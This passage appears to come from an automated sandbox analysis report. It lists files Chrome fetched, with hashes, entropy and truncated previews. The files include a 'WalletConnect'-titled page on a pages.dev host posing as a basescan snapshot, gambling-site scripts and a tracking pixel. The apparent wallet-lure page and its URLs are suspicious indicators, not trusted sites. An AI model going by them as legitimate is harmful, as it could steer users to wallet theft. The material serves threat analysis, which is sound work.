                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 387 x 246, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):28222
                                                                                                                                                                                                                                              Entropy (8bit):7.84190163147567
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:77vG/tFDVJoX4RjHm16anceK/tGOoWWeR9D8HGqE:3G/tFDoX4dm1BcrQONWu951
                                                                                                                                                                                                                                              MD5:422F0525C827E1155F546876DF842CBB
                                                                                                                                                                                                                                              SHA1:82D34F56D077610EC66086E3108F362A3AB226D3
                                                                                                                                                                                                                                              SHA-256:B4EC24EB5C18B4E722779CDDB854659D015C4A4E332514A48709DE0B1657F59A
                                                                                                                                                                                                                                              SHA-512:4422637E0B9778EF671078A6F2D6C43BC7CFA1DA1F2590BF2F9E9EB15705C1950D03B77919933BB768D33DF3F7FD42D57CB854706AE1B5BF983B10E5EBC897CB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............."......PLTE..r......_e`..............................jst...X\R..k..`..n..b..o..h<AG..^..a8??8?@8?@6<=6<=4:;4:;7=?|wZ..g..n..k..^..jljT..eVYLihS..m..polV.{^..f..m..j..p..rspW..rxsY..b^aS..q[^Q..f..k..r..s..szuZ~x[..o..p.~^..k..p..r..g..o..p..r..q..f..r..s..r..p..r..b..m.....n..s..i..r..m=CD.........qxw........................lpk..q..l..r...@FH?CD;BC:CE<BC;BD<BD<BC:CC;AB;BD;AB;BC;CC8>A<CC9AB;BC:AB9@A;BC<DF:AB:AB<GG:AB:DD:@B<BC9@B:AB:@B;DD9AB;AB:BB=BE:AB;AB:AB;BC:AB:BC9AB:AB:AB9@B<BB:AB:BC:AB:@B:AC:BC:BB:@A9@@:AC;AB8@@:AC<BE:BB:AB9AA:AB;BC9@A;BB:AB:AB9?AytY.}]..o..d..n..mfgY..s..b..f..d..d>EGs|}...{.......................@GGBFI..q..o..l......}.....\a\...nwy..............u....................q#N......tRNS..4....]....tPhD.i.x.{/Sc_\XVTRPMa..n.U.LZ..PZ.....K.E`7.>l....B?..9t..S...e-....2nlz.(.IG/k.#.M.^.z.(.\............... !"#$%')++-//11335789:<>>?ABCEFHJKLNOPRSTUUVWYZ[]]^`abbdefdfs.....IW[]'D.;YF.5p.t$#...xVd;.J...}..R....#..)..jYIDATx.....?xA..........
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://my.rtmark.net/img.gif?f=sync&partner=213db3d715874e1fb1bd82bf799dd11e3400b00eebaf8c66399089f07278c397&ttl=&rurl=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n
                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):154188
                                                                                                                                                                                                                                              Entropy (8bit):7.927230468014299
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:UJH/5X8dibjPR8AxaUtCmM7xYn6uSau8LDbBYTQY1tt4WeA725IadMYMJe:UJfxsibjylikYr+wf2EY14rWQnhF
                                                                                                                                                                                                                                              MD5:F3A6B08369D913DB7CD9EADD92F8568E
                                                                                                                                                                                                                                              SHA1:7AC32D8C61417B149B72A27793E8CDAA6150CB49
                                                                                                                                                                                                                                              SHA-256:18F01D4F56C6ACADE54219C467E3F6D54548AAAAAB684B16BCC29327EC437ABC
                                                                                                                                                                                                                                              SHA-512:68183713D82F2677BC615ADAC0C39EEBEFD10701F8C0F7B6D662F7345757D2ACCF55C9D19F2B665F6E896B4D09CB9117CE3E23F4E215F498FAEE79AF74562AAF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.......~.....PLTE....1 .E0.I..;(.O6.C).(..=#.J3.$..W3.P1....3..@,.7%.:..B..I&.C,.Q0.V8....L,.=(I.I.3..<..\7.D#.7..Q-.5#.%._.PM.F...>.;.1..(.i.Y..."U)/k2...a.LF.EF.:`.P-.'u.L$g4.E.+X*.9$.R"&f5A.Czv#.N,2w9..F.V1Le+..A6.;B.@#p5F.Kay/..EVI I.BE> \.O8.OdT#%{98D.y.1"Z+..39.B..g..u..3..2...`H...RN;......2m|#..Qz\.."...b.*.u|.wY..g...wX...R.y...L.>....TW.>J7.....}...2..J.....}U.@.."..&..5..8.K.q ._..;..7.P.B..>.Y.d..i.T..O..*..R.6..-.F.9..2..0..&..n.<.'...-.....w.0..2.?..].F..r.BW@...{Q<..MbI...u.....Y]E..G..=.J....U.I.D..`....o.AhN....7wX......F..B...X].=..v#..).{..w#.\...i.S..L.n.b.G.^.}$.u...qS.kU...c..-..\.....).f..b...0z_..{*.m.b.9..)..j.5.h..x...5..~$y.-..'q.1..).,{.T..?.2t.@.p..G..7s^%..a.l+../.i........D.L...f...k-...K..B..}....Z.........ptRNS...........................f.......ef.f..f.ff.|.yqv..r..}..#.............K...=..M.$..|...h..k_.D...............V.IDATx......................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14623)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):14890
                                                                                                                                                                                                                                              Entropy (8bit):5.3898830891000635
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:0mkM1IGcl7ANRFW58u/jOou6Jetv08pqQ/e3RDG2fhCt7rsNoWCSGq:09M1IvdANWiu/jJJsvJqQ/eDGtMHCSGq
                                                                                                                                                                                                                                              MD5:7232E584DC6FAEE6ED0E900DE1D3C2C5
                                                                                                                                                                                                                                              SHA1:3519146BF62BD92B5510955B6A76CBE3510BD4A2
                                                                                                                                                                                                                                              SHA-256:53E99590C392A96491D6FA9356C5F4C464C8687A650C79026456A79A09FB0520
                                                                                                                                                                                                                                              SHA-512:77588554FA25F7B56D402F9371003A36D1811F3599D48D1E85388BD0B16C4FD9C20A90F01EC2AE218557178D3331781C3136FFAB2379B297A365A19AA1D505EE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["assets/index-DIqvK9Em.js","assets/index-DD2Zk4iT.js","assets/index-CrXVjlJA.css","assets/index-C-NOM3iv.js","assets/index-CMxvzQWG.js","assets/index-D4UuokiM.js","assets/index-CSqi4AR7.css"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{c as e,A as ne,u as le,a as I,b as B,d as se,i as s,t as c,S as ae,e as y,B as k,f as o,g as Y,h as x,L as ie,j as oe,k as j,o as ce,l as $,m as J,n as ge,s as u,U as ue,p as L,q as de,D as me,r as K,v as fe,w as he,x as D,M as pe,E as be,y as _e,z as ve,C as v,F as E,G as xe,I as $e,H as we,J as ye,K as Ce,R as Se,T as Ie,N as ke,O as Be,P as Le,Q as De,V as w,W as Ee,X as Q,_ as Z,Y as Fe,Z as Te,$ as Ae,a0 as Re,a1 as Ne,a2 as Pe,a3 as Ue}from"./index-DD2Zk4iT.js";import{B as Me,R as Oe}from"./index-C-NOM3iv.js";import{S as b}from"./index-CMxvzQWG.js";var z=o("<div>"),Ve=o('<div class="px-4 sm:rounded-xl sm:bg-layer3 sm:px-3">'),je=o('<div class="relative mx-4 mr-2 h-2 w-2">'),ze=o('<div class="ml-2 hidden gap-2 lg
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):72
                                                                                                                                                                                                                                              Entropy (8bit):4.575662329717722
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JS+WFqX/+HwDRIvdBAe4VMO+DYQfDn:qO/+HwNIvdd4he7
                                                                                                                                                                                                                                              MD5:D7D3BA7413C70550623AE4CB99450F2C
                                                                                                                                                                                                                                              SHA1:10FF938BCBF05BB5EB24A6B83BC5B628E78BE453
                                                                                                                                                                                                                                              SHA-256:9AF43B0674CC50E9C747C545899C75F19D6986F47D60797F3677D2F7CD418BC4
                                                                                                                                                                                                                                              SHA-512:A05667D4E4D37F71B0CBD25C1AFCBFBA4E4C9116A8DBAA6E638E1964D45894038110D223CEDF5101E901EEE680544800E2BF00E40D8EA5BDF773D39A304DA618
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{O as f}from"./assets/manifest-aca455c4.js";export{f as default};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 387 x 247, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):27485
                                                                                                                                                                                                                                              Entropy (8bit):7.945874090121692
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:RvMnA4cNZlEJOgYFU5UhQxYO/2M1Ue57IFs1ug:uA4cNgZAUnxx57IFfg
                                                                                                                                                                                                                                              MD5:1EFE421210FEEB0AF40E3EDD2378F918
                                                                                                                                                                                                                                              SHA1:995AA96E10BB16F4B5C7D02412E6C03FC1AC4BA8
                                                                                                                                                                                                                                              SHA-256:C3AFC80887468FBB002D3F3C7AA619B245BCBB702F8554CEAEE36E4C4A51F416
                                                                                                                                                                                                                                              SHA-512:B919284B835E0655C427D6ACB5B5AE2E05FC4DAE00BFFF9B2F48836FDC79844D9CCC042A4F1614AEBFC713A74F89E2C2542E1DD56D79BBCBB330FADA999C985B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............~.C...=PLTE..q..kY[O..i..`..l..p..hvrX..g..i..d?FGeg[..m|wZ..r..s..r..s.._..q..k..q..s..q..q..s..h..o...@JK?EF;CE<BC=BC<DE;BD=BC9CC<BD:ABBCE;BC;BC9AA;BC:AA;BC:AB;BB:AC;AB;AB;CD:@A:DD9?B:AB:AC:BB:AB;AB;BC:@A;CC:AB<BE:AB9@B;BC:AB:AB:AB<CC9@B;AB:AB<CC:AB;BD:AB:AB:AB;BB9@A9?B:BC9@@:AB9@A:BC9@A:@B;BB:AB.y\..^>BF..iWYL..d.._..fmkU..nroW..p..b..^[_W......;EE<BF.....`@FH.{]..o..n..k..l_bU..rlkX..q..q..r..f..k..p..l..r..h..e..`..p..i7>@7>?5<<4:;7=?7>A..k..o..s..h..c..m..r..m..ots^..b..o........................~..x..u}...............................`fd..................rz|...mvw..........]......tRNS.B.g..|Gjx[#/.A....6.L..d.."................ "$%'(*+..002469;=?@BCCDEFHJLLMNOPRRTWYZ\]^__bbcde]oB.Htk.S.L.aS<dTNMKL.<....6.)...Ws.^.(,.xPYWTQME8F.SD~.n.$0j.....gT:?C.u.n..[..4.....|F.Lp..b%....h.IDATx..\[...U^kO..-D..EQ3N|O...z.......D.s1N...ZU.V..T...R.@..M.E.$TU+.q$.@nm.K.....HTBHH-MZ.&....u_..Iy......}.3..........__.~h/L.6.y...L..c.. 'X^2n...`.hEm...4..U.-^.i
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (634)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):635
                                                                                                                                                                                                                                              Entropy (8bit):5.233963609220039
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:kDXvpCH5ZAA9f8bCvyKavKp9PKCSqjMAIKpj34xjD:kBCIA90C9bScd5j3eD
                                                                                                                                                                                                                                              MD5:0D4D6CCC7CD7E3F2392141F967BC3FA4
                                                                                                                                                                                                                                              SHA1:5DF2ABC7460E727EB2C26C43CE249440FFCF0652
                                                                                                                                                                                                                                              SHA-256:B28A003AC373A6C04F162084BE1432238FEFEAE682B41D2002079CEBF3B91D26
                                                                                                                                                                                                                                              SHA-512:8334AA4E2B08272C8E109C2CD3208F811CEB972DA3D935ED9EE8DAC45B16299C2BE4A58AF976BA539C55A2C13A84DCE0DB4EA7B656B1900E6CD0120B21BC6F99
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{a as n,b as f,i as e}from"./isObject-909534d5.js";var o="[object Symbol]";function a(r){return typeof r=="symbol"||n(r)&&f(r)==o}var c=/\s/;function b(r){for(var t=r.length;t--&&c.test(r.charAt(t)););return t}var m=/^\s+/;function y(r){return r&&r.slice(0,b(r)+1).replace(m,"")}var s=0/0,p=/^[-+]0x[0-9a-f]+$/i,I=/^0b[01]+$/i,d=/^0o[0-7]+$/i,x=parseInt;function T(r){if(typeof r=="number")return r;if(a(r))return s;if(e(r)){var t=typeof r.valueOf=="function"?r.valueOf():r;r=e(t)?t+"":t}if(typeof r!="string")return r===0?r:+r;r=y(r);var i=I.test(r);return i||d.test(r)?x(r.slice(2),i?2:8):p.test(r)?s:+r}export{a as i,T as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (26962)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):38289
                                                                                                                                                                                                                                              Entropy (8bit):5.237637991791663
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:8Tn+i2xVnJgnKeeI+Pb5hAKmHvq1yKSgKa+LHZsoUSn:86i6nC+PbLW1
                                                                                                                                                                                                                                              MD5:395ED18EB478342F8284A862C0F6EE36
                                                                                                                                                                                                                                              SHA1:4FDCA8D3D112579A76463E11726D50DBC6C4F370
                                                                                                                                                                                                                                              SHA-256:09D3E129429605D8EBECA043F22DB932CC52046E1FDB1B8E877FB15ABA670A61
                                                                                                                                                                                                                                              SHA-512:C45E3471662239AFA85CB7467F732B80BE5C2E673405471D050DF2D53CA396EBB8F287D9F58AD8B169629E6FF4C70FBD9758F26DD82457B6D0AD0DC69B2FFDEF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/sounds-2c4b6e58.js
                                                                                                                                                                                                                                              Preview:var R=Object.defineProperty;var F=Object.getOwnPropertySymbols;var X=Object.prototype.hasOwnProperty,q=Object.prototype.propertyIsEnumerable;var L=(g,v,r)=>v in g?R(g,v,{enumerable:!0,configurable:!0,writable:!0,value:r}):g[v]=r,E=(g,v)=>{for(var r in v||(v={}))X.call(v,r)&&L(g,r,v[r]);if(F)for(var r of F(v))q.call(v,r)&&L(g,r,v[r]);return g};import{h as I}from"./manifest-51a3674f.js";var S=typeof globalThis!="undefined"?globalThis:typeof window!="undefined"?window:typeof global!="undefined"?global:typeof self!="undefined"?self:{},G={};/*!. * howler.js v2.2.4. * howlerjs.com. *. * (c) 2013-2020, James Simpson of GoldFire Studios. * goldfirestudios.com. *. * MIT License. */(function(g){(function(){var v=function(){this.init()};v.prototype={init:function(){var e=this||r;return e._counter=1e3,e._html5AudioPool=[],e.html5PoolSize=10,e._codecs={},e._howls=[],e._muted=!1,e._volume=1,e._canPlayEvent="canplaythrough",e._navigator=typeof window!="undefined"&&window.navigator?window.navigat
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1267)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1268
                                                                                                                                                                                                                                              Entropy (8bit):5.091535688799997
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:lhJRXBjJnjrnrjNNjjj+Pjb0vQsx3pdk9I4Y0CAsvQsxtpdkzPk8DQs/8FdkKmQI:LJRX9trnXLfO4Isx309I43CAsIsxt0zf
                                                                                                                                                                                                                                              MD5:C359AA0CE89A43C007FC38602AFB603B
                                                                                                                                                                                                                                              SHA1:CE75E1EFF83C35FB55BB7CA6C75440DB0BB0E783
                                                                                                                                                                                                                                              SHA-256:A1BE9E275E710799A2FAC909EC2CF0F2E17D3043C8EB39ADC59A1A4424673776
                                                                                                                                                                                                                                              SHA-512:F1C82E53A1920C145FC9A429EC749BF13AC12A6B7E8DC2491B117848C35019532AF09F3FCB476B1FAF2FCEC155F1D367DA32AD1F3310F97B6C0B6641A539C50B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{h as e}from"./http-f4555b94.js";import{B as s}from"./baseService-449c2e3e.js";const r={getSpinFeeds:()=>e.post("/activity/lucky/spin/news/",{start:new Date().getTime()-24*60*60*1e3}),getSpinRewardSettings:()=>e.get("/activity/lucky/spin/settings/"),getUserSpinConfig:()=>e.get("/activity/lucky/spin/info/"),requestSpin:t=>e.post("/activity/lucky/spin/lottery/",t),getSpinLog(){return e.get("/activity/lucky/spin/giftLog/list100/")}};class n extends s{constructor(i){super(),this.api=i}spinFeedResource(){return this.createSharedResource(()=>({queryKey:[this.spinFeedResource.name],queryFn:this.api.getSpinFeeds,initialData:{totalBonus:0,updates:[]}}),{persisted:!0})}spinRewardSettingsResource(){return this.createSharedResource(()=>({queryKey:[this.spinRewardSettingsResource.name],queryFn:this.api.getSpinRewardSettings,initialData:{version:0,sections:[],fiat:!1}}),{persisted:!0})}userSpinConfigResource(){return this.createSharedResource(()=>({queryKey:[this.userSpinConfigResource.name],q
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (568), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):568
                                                                                                                                                                                                                                              Entropy (8bit):4.554972310892794
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:LkvFrWn0s0s0s0s0s0s0s0s1PAQOzm6SfVVVVVVVVmn:Lk0AQO66Sun
                                                                                                                                                                                                                                              MD5:FEE7C8DFC383B85DFFD0E26CD99A98E5
                                                                                                                                                                                                                                              SHA1:5D765740DD60D9005EE727826D9A4A43ADD4C750
                                                                                                                                                                                                                                              SHA-256:8FD96C40E80DE9BB79849E1C9C061F4317B5FD85FEAD86C847516A4448EF7BFE
                                                                                                                                                                                                                                              SHA-512:438657D1F0EE4579FF1EF31D42C2E93D38CA42D5F1B0B4768377B26FDF25064B98B1A01A6AB8E68CCA1125035393530F28E0781D1D77D8E48ED06C9ADD38FED4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISqgEJvCFRrz0Mip4SBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIXCWWIXn0AAOPcEgUNGmmM3xIFDT0fUzwSEAlBCdISZwSuWhIFDVqx1xASTwlaBNe_WLhjZBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSTwnjpyY1BVI-LRIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8=?alt=proto
                                                                                                                                                                                                                                              Preview:Cs8BCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAApaCgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
